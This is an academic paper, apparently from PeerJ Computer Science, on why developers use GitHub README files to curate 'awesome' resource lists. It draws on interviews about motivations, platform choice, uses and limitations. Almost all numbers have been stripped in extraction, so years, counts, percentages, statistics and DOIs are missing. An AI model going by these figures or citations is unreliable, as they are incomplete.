commonly referred to by librarians and archivists as ‘‘digital curation’’ to preserve digital materials (higgins, ). it can share features used for social bookmarking, where users specify keywords or tags for the internet referencing that helps organize and share curated resources with a larger community (farooq et al., ). there are several early popular social bookmarking tools, such as del.icio.us, which allows sharing of personal bookmarks (golder & huberman, ); flickr, a photo tagging and sharing service (marlow et al., ); and reddit, a community-driven link sharing, comment, and rating service (singer et al., ). curation behaviors have been further studied since social media was appropriated to enable new forms of curation. specifically, duh et al. ( ) report the use of a third party tool, togetter, for curating tweets, and uncover the intended purposes for these curated lists, including recording a conversation, writing a long article, or summarizing an event (duh et al., ). zhong et al. ( ) conduct surveys of pinterest and last.fm users and find that the majority users engage with the curation site for personal interests rather than social reasons (zhong et al., ). a recent study examines the ways that communities leverage a variety of social tools for curation to support vital community activities in a large enterprise environment (matthews et al., ). the authors also call for future studies on curation in public internet communities (matthews et al., ). curation on github is a unique instance of curation set apart from the above studies in the following ways. first, the user body of github is drastically different. services like twitter, pinterest, and reddit, are services for the general population with diverse backgrounds and interests, while github is intended for a focused community of software developers. members of the software developers’ community share a set of common goals and practices, which is likely to affect their participation in curation practices as well. second, unlike pinterest, which itself is designed for curation of links, github is an online work platform designed for software developers to collaborate with others on software projects, and curation is an appropriation of the collaborative coding features of the platform. the reasons behind such appropriation and whether github features fully meet curation needs of developers are yet to be discovered. third, the technology affordances of github largely depart from the above mentioned services. tools like pinterest and flickr, are designed for personal collection and sharing of hyper links. reddit allows users to vote to promote links, but it hardly preserves resources. github provides a collaborative working space, i.e., the repository, where software developers can work on the same project together and are enforced by git workflow. therefore, github is distinct regarding user base, intended purpose, as well as technology affordances. its appropriation for curation purpose raises an interesting question concerning user’s motivations and experiences. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. software developers’ motivations for participating online communities researchers report two main categories of motivations that drive software developers’ voluntary participation in open source software projects: ( ) internal motivations, i.e., intrinsic motivations, altruism, and community identification, and ( ) external rewards, including expected future rewards and personal needs (hars & ou, ; ye & kishida, ). internal factors include ‘‘intrinsic motivation’’, which refers to the feeling of competence, satisfaction, and fulfillment as a motivator to participate in open source projects; ‘‘altruism’’ refers to software developers desire to care for others’ welfare at own cost; and ‘‘community identification’’ refers to individual software developers’ alignment of goals with the larger community. external factors include ‘‘future rewards’’ that are inured when software developers view their participation as investment, and expected future returns, including revenues from related products and services, human capital, self-marketing, and peer recognition; ‘‘personal needs’’ are software developers’ personal demand for their activity, for example, perl programming language and apache web server both grew out of software developers’ self-interests to support their work (hars & ou, ). both internal and external factors are important motivations that drive software developers’ participation in open source projects. the rise of social media impacts the way software developers participate in online space. social media are often referred to as socially enabled tools, where social features are added to software engineering tools (storey et al., ). it lowers the barrier to publishing information, allows fast diffusion, and enables communication at scale, which facilitates a ‘‘participatory culture’’ in the software developers’ community (storey et al., ; jenkins et al., ). as a result, software developers increasingly participate in the community via social media that enhances learning, communication, and collaboration (dabbish et al., ; doll, ; singer et al., ). similarly, software developers are motivated to participate in order to satisfy personal needs (e.g., improve technical skills) and to gain peer recognition (e.g., recognition by the community) (storey et al., ). despite the well-studied motivations for software developers’ participation in online communities, software developers’ motivation to engage in curation practices within github by appropriating a collaboration software development features are currently under-explored. prior github research github has drawn attention from researchers in recent years, who have examined its features that promote transparency, such as activity traces, user profiles, issue trackers, sourcecode hosting,and collaboration(storey et al., ; dabbish et al., ). researchers have examined in detail how such transparency allows software developers to engage with software practices in the community (dabbish et al., ; doll, ; singer et al., ). for example, dabbish et al. ( ) find that the activity logs and user profiles on github motivate members to contribute to software projects (dabbish et al., ). marlow, dabbish & herbsleb ( ) discover that developers use a variety of social cues available on github to form impressions of others, which in turn moderates their wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a part of the readme.md file of awesome-go curation project. collaboration (marlow, dabbish & herbsleb, ). singer et al. ( ) put github in a largersocial mediaenvironment, and learnedthat softwaredevelopers leverage transparency of socially enabled tools across many social media services for mutual assessment (singer et al., ). these studies focus on how the technology accordances of github and other social media affect software practices, including learning, communication, and collaboration (storey et al., ). curation as an emerging practice on github raises interesting questions as to the reasons that such practice is thriving in the software developers’ community, why it emerges and gains popularity on github, and whether github features fully support this type of practice. appropriating github for curation curation practices are enabled by github features. specifically, github introduces a readme.md file in the root directory of each repository. the contents of the readme.md file are displayed in the front page of the repository, i.e., if a user visits the url of a software repository hosted on github in a browser, the readme.md file will be displayed as a web page (fig. ) (https://github.com/avelino/awesome-go) along with repository structure and some project statistics, such as the number of forks and wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/avelino/awesome-go http://dx.doi.org/ . /peerj-cs. stars (mcdonald & goggins, ). the content of reame.md file can be structured with markdown syntax (https://help.github.com/articles/basic-writing-and-formatting- syntax), which provides rich text features, including table of contents, links, tables, etc. readme.md is designed for adding description and documentation for a repository (https://help.github.com/articles/create-a-repo). curation on github appropriates the readme.md file of a repository to create a list of resource indexes within one page. it categorizes resources into different themes and differentiates them into sections. typically, each resource is recorded with the resource name and a brief description of the resource (see fig. ). in addition, urls are attached to each of the curated items. clicking a resource name (shown in blue in fig. ) will direct the user to the real web location of the resource. methodology to explore and understand software developers’ experiences appropriating github for curation, we conducted a qualitative study with curation project owners. the study was approved by penn state university institutional review board, under the approval number prams . in this section, we describe our recruitment procedure, interview protocol, and data analysis processes. participants recruitment to identify participants engaged in curation practices, we queried the github search api on / / using the keyword ‘‘curated list’’ to search for curation repositories. the query returned repositories hosted on github. we recorded the owner’s user id for each repository in the list, then we queried github api again to fetch profiles with email addresses of each id. the query returned unique owners with email addresses, which we used to create a randomized list and sent email invitations to curation project owners. recipients were asked to engage in a semi-structured online text-based interview carried out via facebook messenger, skype, or google hangouts. we began our recruitment process in early december and completed all interviews in late january . the resulting participants included males and one female with github experiences ranging from six months to six years. fourteen of the participants are professional software engineers, one was a graduate student, and one was a microbiologist. eleven participants used the descriptive word ‘‘awesome’’ as the prefix to name their curation repository. the participants had a varying number of followers: five had less than followers; eight had between and followers, and four had more than followers. in the following section, we refer to individuals by participant number (from p to p ). interview protocol we conducted text-based online interview with participants, and each discussion lasted approximately to min. the interviews were semi-structured by the four general areas below. • motivations to curate resources, • reasons for technology choice (github), wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/create-a-repo http://dx.doi.org/ . /peerj-cs. table summary of the coding scheme. theme category count (n = ) altruism personal needs curator motivations peer recognition familiarity with github reasons for appropriating github relevant context and audience supporting work learning a new topic usefulness of curated list communication immature format hard to maintain limitations of curation difficult to market • how curated lists are useful, • the limitations of current curation practices (on github). questions were administered conversationally to engage the participants, and they were open-ended enough that we could pursue new topics raised by the participant. participants were interviewed in english. the interview scripts were then downloaded for analysis. data analysis procedure we conducted our iterative analysis through four rounds of interviews allowing the first round of analysis to guide our second round of interviews, and following similarly in the third and the fourth. themes and codes were identified, discussed, and refined in this process (lacey & luff, ). in the first round of analysis, we performed open coding on the responses (strauss, ), grouping examples that are conceptually similar. for each subsequent round of interview, we compared concepts and categories that are similar to previous ones. and in this process, we continued to refine our coding scheme while also revealing new ones. we discussed the codes collaboratively and repeatedly. we concluded the study after reaching the point of theoretical saturation, when categories, themes, and explanations repeated from the data (marshall, ). a second researcher independently coded four sample interviews transcripts. our analysis showed inter-coder agreement between the two researchers (kappa = . ). in the process of coding, we recognized that some themes and categories are consistent with prior literature, i.e., curator motivations (altruism, personal needs, and peer recognition). instead of developing new categories, we labeled them according to existing literature. the complete coding scheme is shown in table . results the results of our analysis describe curation practices on github from the aforementioned four aspects, including ( ) motivations to curate, ( ) technology choice, ( ) the use of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. curated resources, and ( ) the current limitations of curation practices on github. the analysis is presented through a count of themes present in coded interviews (table ) and representative quotes from each of the four themes. motivations to curate internal factors (i.e., altruism, community identification, and intrinsic motivation) and external rewards (i.e., personal needs and peer recognition) are identified as motivating factors in software developers’ participation in open source software projects (hars & ou, ). in this study, our participants confirmed altruism ( . %), personal needs ( . %), and peer recognition ( . %) motivated their participation in curation projects. internal factors—altruism participants reported that they engaged in curation practices because other community members might benefit from their effort. for example, p believed the high quality of curated resources could help beginners with programming: ‘‘i see so many people when they take introductory classes in programming, they come to github to get ready repositories...and that is overwhelming at first...so to get the started and motivated with programming i thought of collecting resources together in (p ’s curation project)’’—p p wanted to help people who were in a similar position to himself: ‘‘i’m a kind of remote engineer, then i want to create a list for someone tend to like me about product manager list, i just want to save some links for my learning purpose ... then public for someone if they’re in need’’—p external rewards personal needs and peer recognition form software developers’ external rewards derived from participating in open source projects (ye & kishida, ). these rewards also drive engagement in curation practices. personal needs were the most discussed reason for participation in curation ( . %). specifically, software developers reported that curation repositories improved productivity and enabled communication with others. before creating curation projects, half of participants who were familiar with a particular set of resources relied on search engines whenever they tried to locate the url of the resource. one important reason they chose to curate resources was to avoid such repetitive search efforts. ‘‘before making the repo i had to do research each time i needed a (p ’s curation topic). now that i have a list, i just refer back to it when needed.’’—p ‘‘i simply created my own list of the sites i found to be good. the idea really was to get out there scout for sites once and then be able to come back to a list without worrying about it having sites i found bad.’’—p in addition, a curated repository has a permanent url, which was reported as a convenient way to share resources with others who were outside of curation repositories. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. participants stated that with curation projects, they only needed to point others to the urls of their curation repositories. it was both convenient for them to share and for others to find. for example, p created the curated list so that she could conveniently share curated resources with others. peer recognition surfaces as another important motivation for software developers’ participation in curation practices on github. the community of software developers on github adopts a particular way to endorse curation projects. a highly reputable software developer on github, sindre sorhus ( . k+ followers), creates the ‘‘awesome’’ (repository name) project on / / , which is a meta list of curated lists (https://github.com/sindresorhus/awesome). it contains a community drafted ‘‘awesome manifesto’’ (https://github.com/sindresorhus/awesome/issues/ ), which depicts guidelines and standards for curation practices, and requires that curation repositories conform to it if they want to be included in this meta list. the project currently has around , watchers, more than , stars, and approximately , forks, ranking the nd most starred repository created after / / (https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults). out of participants used ‘‘awesome’’ as a prefix to their curation project name in an effort to conform to the naming convention as well as to indicate the quality of the content. of them mentioned that they were inspired by the original ‘‘awesome’’ project. of them hoped to get their curation repository indexed by it, and one participant’s curation project was already included in the ‘‘awesome’’ list, who felt a great honor (p ). p reported putting effort forward to improve his curated list to conform to the guidelines and standards as defined by the ‘‘awesome’’ project, stating ‘‘...with the awesome endorsement i’m hoping it becomes a collection people trust’’ (p ). it demonstrated that our participants were putting efforts to align their goals with the larger community, i.e., conforming to the community standard for curating high quality resources, and would like to be recognized by the community. in addition, p reported that her involvement in curation efforts helped her obtain her current job, and p reported that a company approached him and wanted to collaborate with him on his curated content. these rewards emerged as side-effects of curation efforts, not one of the guiding motivations for software developers to begin a curation project. the technology choice—why github compared to the github platform, the features on sites like wikipedia might be considered better suited for hosting curation projects by providing convenient editing and collaborating features. however, popularly used and referenced curation projects for software developers are predominantly hosted on github, whose features and information structures are designed for source code hosting and project collaborating (marlow, dabbish & herbsleb, ; storey et al., ) rather than creating and preserving lists of resources. in this section, we will address why curation has emerged as a common way to appropriate github repositories. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sindresorhus/awesome https://github.com/sindresorhus/awesome/issues/ https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults http://dx.doi.org/ . /peerj-cs. familiarity with github participants reported that software developers’ existing knowledge about github and its features, i.e., their strong media literacy (storey et al., ) with github, prompted them to choose this platform to host curation projects. in general, software developers are familiar with github’s text editing format (i.e., markdown syntax) and are comfortable using it. p and p both claimed that ‘‘github was a tool that i was familiar with’’ and ‘‘so yes github would be a more natural tool to use.’’ specifically, software developers are accustomed to writing and formatting text contents with markdown syntax. for example, p expressed that ‘‘...i love write in markdown format!’’, and p considered that ‘‘github has a really easy way to write content in rich format (using markdown) and view it.’’ ‘‘...as developer, i think github is the best place for developer to collaborate with other to build good resource.’’—p intimate knowledge about github collaborating features is another factor: ‘‘github is a really good platform to collaborate. anyone could come, fork it, extend it and ask me to ‘merge’ it (update my list).’’—p ‘‘...the advantage of using github is other people can contribute easily.’’—p relevant content and potential audience participants also chose github for curation because: ( ) the curated contents were relevant within the github context, ( ) there was a large potential audience on github, and ( ) the github community encouraged contributions. a total of out of participants’ curation projects were related to software development practices. they considered github just suitable as a platform for sharing software development related contents: ‘‘...(it is) the place to be for projects like this’’ (p ). github has attracted a large base of like-minded users when it comes to software devel- opment, which increases the chances of matching resources with an interested audience: ‘‘github has a very large audience/devs actively spending time in it, so it’s definitely the right place to publish a project such as this...’’—p in addition, hosting curation projects on github encourages contributions. github has many collaborative features. it is a common practice on github for users to contribute to other projects (dabbish et al., ; marlow, dabbish & herbsleb, ; wu et al., ). p reported that ‘‘github can target at the right audience, and contributing is encouraged more...’’. p claimed that ‘‘...enable other people to (freely) contribute to it is very important to me (and i think other curators also feel the same) so a git hosting site is ideal.’’ participants also believed that other people on github, who had more experiences and knowledge than themselves and other could enhance the repositories by contributing to lesser developed parts of the repository. ‘‘the main reason is collaboration...i may have some resources but other people may have even better stuffs or ideas to share.’’—p wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the use of curated resources curated resources are useful for software developers to support their work, learn about a new topic, as well as communicate with others. supporting work software developers rely on others’ work to accomplish their own projects. participants reported that they used different curated lists, including their own, as bookmarks or references to quickly locate the resources they need. ‘‘before making the repo i had to do research each time i needed a (resources). now that i have a list. i just refer back to it when needed. it serves as a good toolkit for future projects.’’—p ‘‘i recently have created a python repository and since i was not used with python at all, i used awesome-python to know some libraries recommended by the community.’’—p in addition to supporting their work, participants also used the curation repository to keep track of high-quality resources in case they need them in the future. for example, ‘‘if i used it or i’m planning to use it, i’ll add it there. if the resource is well written with tests and should be considered while selecting specific category, i’ll add it too... but also i add (resources) that i checked already and found it interesting for the future projects.’’—p learning a new topic when first encountering new development related topics, software developers often find themselves feeling overwhelmed. the complex information scope in the software developers’ community makes it hard for developers to start tasks quickly. for example, p reported that ‘‘when we start to learn new thing, there are many things, we cannot know what should to spend time on.’’ a curated list that provides centralized peer-reviewed resources about a specific topic provides a starting point where developers know that they can find high-quality resources and begin learning the subject. ‘‘...i’m an ios engineer. but someday i like to learn ruby, i just go to awesome-ruby and pick some recourse for beginner. googling is not going to help us like that.’’—p ‘‘so say if i starting to learn a new tool and need to get started quickly. i might go to the main awesome list and search for it.’’—p communication communication is essential among software developers in order to transfer knowledge between stakeholders, as well as facilitate learning, coordination, and collaboration (storey et al., ). curation serves important communication purposes, including reduction of communication costs and creating a shared knowledge space. ‘‘i’m relative active in the meetup community in (p ’s location). talking to people, there is always a lot of talk about what makes a good (p ’s curation topic). i created wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. list so that i can point to other easily... i refer a lot of people to the list who are looking at improving their (p ’s curation topic).’’—p one can share the content of resources with others in the current time as well, as reported by p : ‘‘...i sometimes encounter people who’ve watched (p ’s curation repository) and didn’t really like them, but my hunch is they haven’t seen the great ones, so i send them to check out my list to see if i can convince them otherwise...’’—p limitations of using github for curation in this section, we summarize constraints that our participants have encountered when carrying out curation on github. immature structure and format of current curated lists the readme.md file on github typically includes an introduction to each project and current curation practices mainly rely on that single readme.md file to list all curated resources. sometimes a list may grow excessively long. participants complained that ‘‘resources are not searchable (when on a list)’’ (p ), and it was cumbersome for them to navigate through a long list: ‘‘the only thing sometimes that nags me is that some of them are very long, which in some sense defeats the purpose.’’—p in a case where a curated list was too long, p created a shorter version of the same topic by selecting resources most important to him: ‘‘there is another remote list...lot of stars, around k or more, but i find it that there are lots of resources, then when i look into, i’m scared of. then i want to create my own list, just something i think useful for most.’’—p another issue raised is that the brief description of each item in the curated list (noted in fig. ) can be incorrect, inaccurate, or misleading: ‘‘bad description doesn’t allow finding the required resource.’’—p further, although these curated lists are intended to be collaborative efforts (i.e., multiple people suggest adding, deleting, or updating entries), there is no intuitive way for an audience to express their opinions or raise uncertainties about resources, only modify content. one participant suggested including a rating system in the curated list to help audience filter resources: ‘‘...maybe it would be better we could like/dislike the resources ...sometimes the resources are sorted by name when popularity would be a better option... something like this would give us an overview of how much important some entry in a list is for the community.’’—p wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. excessive efforts to filter and maintain resources it requires a lot of time and efforts to navigate in this complex information space where curation takes place and to filter a handful of good resources. p emphasized the time constraints for curation: ‘‘time. time is hard...digging through all of these resources takes time, and i’m usually pretty time constrained.’’ (p ). due to the fast changing nature of the software industry, old resources become outdated and new resources emerge instantly. curation repositories require efforts to be simply maintained, including getting rid of the outdated resources, and adding state-of-the-art resources. p reported that one drawback of the current curation practices was that curated resources have ‘‘no quality update.’’ difficulties for marketing although github contains a vast and relevant user base, it does not provide mechanisms for a repository owner to distribute the list directly to the relevant audience. our participants expressed that it was hard for them to target their repositories to users who were interested in the curation topic. for example, p conveyed his desire to recruit more contributors: ‘‘the only drawback is the lack of pull requests. i want more... (i want to) discover datasets i missed.’’—p and p found that it was demanding to reach out to both potential collaborators and consumers: ‘‘while it’s easy to host a project on github, you still need to put effort into marketing it, so you get other people contributing or finding it.’’—p unlike social media services such as facebook, which automatically curates and recommends personalized content for each user, github only contains technical features to allow users to search for information. if github users are not aware of the existence of such curation projects, it would be difficult to find these resources in the first place. therefore, admitting curation projects are embedded in the context of an abundant potential audience, they still lack mechanisms and features for marketing to parties of interest. discussion our study provides an in-depth view of curation practices on github. we first assessed curator motivations in participating in curating activity, and compared them with motivations in open source participation literature. then, we analyzed the reasons that github was chosen for curation purposes. next, we evaluated the implications of curation repositories to software developers’ community. and finally, we uncovered the current limitations of curation practices. in this section, we generalize these main findings and discuss design suggestions with the hope to improve curation practice in the future. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. curator motivations one primary motivation for engaging in curation is altruism, which is also widely recognized as an important motivation for software developers’ participation in open source projects (hars & ou, ; lakhani & wolf, ; ye & kishida, ). this finding indicates that helping behaviors may be a common reason why software developers are motivated to participate in some online activities. thus, when designing systems for facilitating software development related practices, we should consider software developers’ desire to support each other. enjoyment-based intrinsic motivations are the primary reason that software developers take part in open source projects, but were not specifically mentioned by the participants as a drive for engaging in curation. researchers have learned that intrinsic motivations drive software developers to spend more time and effort on open source projects (lakhani & wolf, ), and it is positively reinforced by community recognition (ye & kishida, ). therefore, many software developers commit themselves to open source projects for a relatively long time. at the same time, altruism alone is recognized as an unsustainable incentive for open source participation (ye & kishida, ). the comparison of motivations to curation with participation in open source projects leads to questions concerning curators’ long-term engagement, such as whether intrinsic motivations are involved in driving curators, whether altruism can sustain curator’s long-term participation in curation activities, and if not, whether there is a mechanism that regularly feeds curators’ motivations to curate. the answers to these questions are beyond the scope of this study and requires further investigation. leveraging github as a tool for communication while github is known as a tool for software projects hosting and collaborating (dabbish et al., ; marlow, dabbish & herbsleb, ), and communicating knowledge in software artifacts (storey et al., ). this study finds that github is also a good tool for communication of socially generated resources for developers. here, we describe the features that have supported this practice. first, github features allow curation repositories to be shared easily. with a robust version control system as we as uniquely assigned public url for each github repository, github guarantees the integrity and durability of curated contents and enables easy sharing. these technical features make github repositories ideal for communicating resources with others. second, github attracts potential audiences who can contribute to curation repositories. by connecting to relevant audience group, github allows others to suggest potential curated items and evaluate existing ones. as such, the emerging of curation repositories indicates that software developers’ community starts to utilize github for communicating knowledge that is socially generated and maintained (storey et al., ). github as a communication tool establishes its flexibility and reconfigurability. with a simple appropriation of its features, github becomes a favorite tool intended for curation purposes in software developers’ community. such reconfigurability will lead to other practices besides curation, which can further benefit software developers’ community. for wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. example, github users started to appropriate github repositories to write and publish software development related books (https://github.com/getify/functional-light-js/), which accepted community suggestions as well as changes. also, software developers initiated sharing training materials for others to discuss related matters as well as retrieving improvements (https://github.com/kentcdodds/es -workshop). curation to strengthen software developers’ community onboarding new members and educating existing members are essential for communities of practice to sustain and grow (lave & wenger, ; wenger, ; wenger & snyder, ). the results of this study demonstrate that curation repositories on github reflect these core utilities of communities of practices. software development related resources are changing rapidly, and software developers usually rely on a number of services and channels, such as stack overflow and twitter, to keep themselves up-to-date with the trend (storey et al., ). by centralizing peer-reviewed resources in an active community of relevant audience, curation repositories create a reliable channel that simplifies the process of discovering high quality resources. they are likely to reduce the amount of efforts individual member of the community spent on locating and filtering the resources. in addition, as the curated resources are peer-reviewed, they are more likely to guide one’s learning of a certain topic than random resources encountered on the internet. thus curation repositories optimize the way that resources are disseminated and consumed in software developers’ community, which in turn helps the community to grow. the importance of curation for the software developers’ community also raises interesting questions concerning the professional trajectories of the curators in the community. curators relate the resource providers, i.e., software developers who develop tools, packages, frameworks, etc., with resource consumers, i.e., software developers who need to learn or work with tools, packages, frameworks, etc. in this sense, they are similar to brokers, who bridge different groups and control information flow in a community, and often bargain for better terms because of their unique positions (burt, ; burt, ; van liere, ). however, the existing studies of brokers either happen in the cooperate environment (burt, ; burt, ) or community networks (carroll, ), and the brokerage is resulted from establishing social connections, which leads to social capital gain (carroll, ; burt, ; van liere, ). in contrast curators broker information by creating artifacts in an online social network environment. in this study, we have one participant who obtained a new job in part due to her work on a curation repository. however, whether curation helps curators bargain for better terms in general, and whether curators established social ties and how long such social ties exist as a result of curation requires future investigation. design implications and future directions our analysis describes github as a technical infrastructure that meets the needs of curation practices. however, there is still substantial room for curation practices to improve. our participants found that curating software related contents required a great deal of effort to filter resources and to actively maintain the existing ones. in addition, as the length of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/getify/functional-light-js/ https://github.com/kentcdodds/es -workshop http://dx.doi.org/ . /peerj-cs. the curated list grows, it also creates navigational difficulties. the current conditions could be improved by ( ) empowering curation with automated filtering tools, and ( ) adding navigational support within a curated list. automated tools can reduce the amount of effort curators need to spend on curating processes. curators currently do manual selection and evaluation of potential resources as well as eliminating outdated resources. selections are usually achieved by employing search engines or following recommendations from others. automated tools can help curators reduce the manual efforts spent on finding and maintaining resource lists. for example, some of our participants manually refer to third party tools to check resources status, such as last-updated-date. an automated tool that checks and filters resources according to query fields can largely diminish the noise and reduce time and efforts to select and evaluate resources. in addition, an automated tool can also help maintain existing resources, by checking whether a software project is still under active development or it is deprecated. providing navigational support aims at solving the following issues: ( ) lengthy curated list, ( ) lacking a search function, and ( ) lacking common themes across different curation projects. to be more specific, anchored table of contents, which is fixated on the screen, gives readers a clear structure of a document, as well as enables them to jump among sections. this change would make navigating a long list easier. adding a search function within a curation repository, allowing users to query keywords of the curated items, can help users explore and find ideal resources promptly. also, templates can provide common structure and themes in different curation repositories. for instance, our participants mentioned that one of the features they wanted for each curation repository to have was to include a beginner’s section, where they could easily find out hands-on resources. curation repositories could adopt a template that includes commonly identified themes, so that users will be familiar with the structure of different curation repositories and thus locate resources more efficiently. future work should seek feedback from github users who are consumers of resources in curation projects. together with what we have learned from this study, we will design and implement tools to help curators select, evaluate, and maintain resource lists more effectively, and allow users to navigate and retrieve desirable resources readily. limitations our study was a qualitative investigation of self-reported curation practices and experiences of github developers. more specifically, we did not carry out a controlled study to manipulate hypothesized causal relationships among constructs. also, due to our limited sample size, cross tabulations among responses were unlikely to be generalizable to the larger population of curation repository owners. a general limitation of qualitative field methods is that some well-known approaches to validity, associated with positivist science, cannot be employed, such as construct validity, statistical validity, or predictive validity. for a qualitative research design such as ours, credibility and transferability are key validity issues: credibility is whether the results are believable and transferability refers to the degree to which the results can be transferred to other settings (guba, ; hoepfl, ). wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. credibility. we tried to ensure credibility by having two researchers code the data independently, and then calculating the kappa statistic to assess coding agreement. in addition, we used member checking in the interview process to have participants directly corroborate findings. these two approaches were encouraging and convergent, indicating very good credibility for our reported findings (lincoln & guba, ). we acknowledge that this is only a starting point in understanding curation practices in github, but it succeeded in raising many issues that could be pursued now in more constrained research designs. transferability. there are several potential threats to the transferability of this study. first, the owners of the most popular curation repositories did not respond to our interview invitation. given those celebrity curators’ massive audience base and extensively received contributions and attentions, their motivations and practices might be different from the general curators we focused in this study. second, the way we recruited our participants was to use the keyword ‘‘curated list to search through repository descriptions on github and identified repository owners as our potential interviewers. this search method is transparent and direct, but may have missed curation repositories and owners that did not self-identify with our keywords. follow-up research can expand the criteria for identifying repositories to further develop our findings. finally, all of the curators we investigated were recruited on public github, so our results may not generalize to closed source systems. this is another direction for subsequent research to develop our initial findings. conclusion this study seeks to close a gap in the literature by providing a greater understanding of the motivations that software developers appropriate github for curation, and their experiences with that practice. by conducting in-depth interviews with participants about their curation experiences, we uncovered that curators were motivated by altruism, personal needs, and peer recognition, which were comparable to motivations to participate in open source projects. whether these motivations support long-term participation in curation practice is yet to be discovered. curation repository is an appropriation of an online collaborative working tool, indicating that software developers’ community starts to leverage github as a tool for communicating socially generated knowledge. it reflects the flexibility and reconfigurability of the tool. and other similar practices, such as sharing course curriculum on github, start to surface. in addition, curation repositories serve important functions of communities of practice. they support software developers’ work, guide learning through an engineering topic, and communications within the community. curation practice strengthens software developers’ community and can help it grow. finally, current curation practices are limited by lacking standard formatting, tools for helping curators find and maintain existing curated resources, and reaching the target audience, which creates opportunities for future improvements. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests john m. carroll is an academic editor for peerj computer science. author contributions • yu wu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • na wang conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jessica kropczynski conceived and designed the experiments, contributed reagents/ma- terials/analysis tools, wrote the paper, reviewed drafts of the paper, suggested relevant works and possible framing. • john m. carroll conceived and designed the experiments, contributed reagents/materi- als/analysis tools, wrote the paper, reviewed drafts of the paper, guided and oversaw the entire process. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study was approved by penn state university institutional review board. data availability the following information was supplied regarding data availability: the interview transcripts have been uploaded as supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bamforth db. . technological efficiency and tool curation. american antiquity : – . burt rs. . structural holes and good ideas. american journal of sociology ( ): – doi . / . burt rs. . brokerage and closure: an introduction to social capital. oxford: oxford university press. carroll jm. . the neighborhood in the internet: design research projects in community informatics. new york: routledge. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. dabbish l, stuart c, tsay j, herbsleb j. . social coding in github: transparency and collaboration in an open software repository. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . dabbish l, stuart c, tsay j, herbsleb j. . leveraging transparency. ieee software ( ): – doi . /ms. . . doll b. . million repositories. available at https://github.com/blog/ - - million-repositories (accessed on december ). duh k, hirao t, kimura a, ishiguro k, iwata t, yeung c-ma. . creating stories: social curation of twitter messages. in: proc. icwsm . farooq u, kannampallil tg, song y, ganoe ch, carroll jm, giles l. . evaluating tagging behavior in social bookmarking systems: metrics and design heuristics. in: proceedings of the international acm conference on supporting group work. new york: acm, – . golder sa, huberman ba. . usage patterns of collaborative tagging systems. journal of information science ( ): – doi . / . greene d, reid f, sheridan g, cunningham p. . supporting the curation of twitter user lists. arxiv preprint. arxiv: . . guba eg. . criteria for assessing the trustworthiness of naturalistic inquiries. educational communication and technology journal : – . hars a, ou s. . working for free? motivations of participating in open source projects. in: proceedings of the th annual hawaii international conference on system science. piscataway: ieee. higgins s. . digital curation: the emergence of a new discipline. international journal of digital curation ( ): – doi . /ijdc.v i . . hoepfl mc. . choosing qualitative research: a primer for technology education researchers. journal of technology education ( ): – doi . /jte.v i .a. . jenkins h, purushotma r, weigel m, clinton k, robison aj. . confronting the challenges of participatory culture: media education for the st century. cambridge: mit press. lacey a, luff d. . qualitative data analysis. sheffield: trent focus. lakhani k, wolf rg. . why hackers do what they do: understanding motivation and effort in free/open source software projects. mit sloan working paper no. - . cambridge: mit. lave j, wenger e. . situated learning: legitimate peripheral participation. cambridge: cambridge university press. lincoln ys, guba eg. . naturalistic inquiry. beverly hills: sage publications, inc. marlow j, dabbish l, herbsleb j. . impression formation in online peer production: activity traces and personal profiles in github. in: proceedings of the conference on computer supported cooperative work. new york: acm, – . marlow c, naaman m, boyd d, davis m. . ht , tagging paper, taxonomy, flickr, academic article, to read. in: proceedings of the th conference on hypertext and hypermedia. new york: acm, – . wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ms. . https://github.com/blog/ - -million-repositories https://github.com/blog/ - -million-repositories http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /ijdc.v i . http://dx.doi.org/ . /jte.v i .a. http://dx.doi.org/ . /peerj-cs. 